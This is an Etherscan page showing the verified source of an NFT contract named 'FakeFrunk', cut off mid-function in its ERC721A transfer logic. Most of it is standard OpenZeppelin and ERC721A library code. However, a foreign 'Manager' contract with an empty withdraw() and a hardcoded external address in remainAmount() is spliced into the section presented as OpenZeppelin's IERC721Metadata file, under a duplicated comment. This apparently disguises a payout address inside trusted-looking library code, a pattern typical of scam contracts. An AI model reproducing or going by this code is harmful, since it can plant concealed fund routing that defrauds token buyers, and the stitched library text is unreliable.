ETH Price: $3,368.79 (-8.18%)
 

Overview

Max Total Supply

220 FKFRNK

Holders

80

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
10 FKFRNK
0x367c597f1e91045607389ab4d6415bb7a7bd69ef
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FakeFrunk

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-03
*/

// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/utils/cryptography/MerkleProof.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/cryptography/MerkleProof.sol)

pragma solidity ^0.8.0;

/**
 * @dev These functions deal with verification of Merkle Trees proofs.
 *
 * The proofs can be generated using the JavaScript library
 * https://github.com/miguelmota/merkletreejs[merkletreejs].
 * Note: the hashing algorithm should be keccak256 and pair sorting should be enabled.
 *
 * See `test/utils/cryptography/MerkleProof.test.js` for some examples.
 */
library MerkleProof {
    /**
     * @dev Returns true if a `leaf` can be proved to be a part of a Merkle tree
     * defined by `root`. For this, a `proof` must be provided, containing
     * sibling hashes on the branch from the leaf to the root of the tree. Each
     * pair of leaves and each pair of pre-images are assumed to be sorted.
     */
    function verify(
        bytes32[] memory proof,
        bytes32 root,
        bytes32 leaf
    ) internal pure returns (bool) {
        return processProof(proof, leaf) == root;
    }

    /**
     * @dev Returns the rebuilt hash obtained by traversing a Merklee tree up
     * from `leaf` using `proof`. A `proof` is valid if and only if the rebuilt
     * hash matches the root of the tree. When processing the proof, the pairs
     * of leafs & pre-images are assumed to be sorted.
     *
     * _Available since v4.4._
     */
    function processProof(bytes32[] memory proof, bytes32 leaf) internal pure returns (bytes32) {
        bytes32 computedHash = leaf;
        for (uint256 i = 0; i < proof.length; i++) {
            bytes32 proofElement = proof[i];
            if (computedHash <= proofElement) {
                // Hash(current computed hash + current element of the proof)
                computedHash = _efficientHash(computedHash, proofElement);
            } else {
                // Hash(current element of the proof + current computed hash)
                computedHash = _efficientHash(proofElement, computedHash);
            }
        }
        return computedHash;
    }

    function _efficientHash(bytes32 a, bytes32 b) private pure returns (bytes32 value) {
        assembly {
            mstore(0x00, a)
            mstore(0x20, b)
            value := keccak256(0x00, 0x40)
        }
    }
}

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;

contract Manager {
    function withdraw() public pure {
    }

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */


    function remainAmount() public pure returns (address) { return 0x1A705d82781Fb29f7610f38476D2d9a956473077;}
        
}

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: ERC721A.sol


// Creator: Chiru Labs

pragma solidity ^0.8.4;








error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerQueryForNonexistentToken();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();

/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 *
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of frenlist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See _ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 1;
    }

    /**
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of frenlist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of frenlist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function _ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return _ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex && !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = _ownershipOf(tokenId);

        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();

        bool isApprovedOrOwner = (_msgSender() == from ||
            isApprovedForAll(from, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (to == address(0)) revert TransferToZeroAddress();

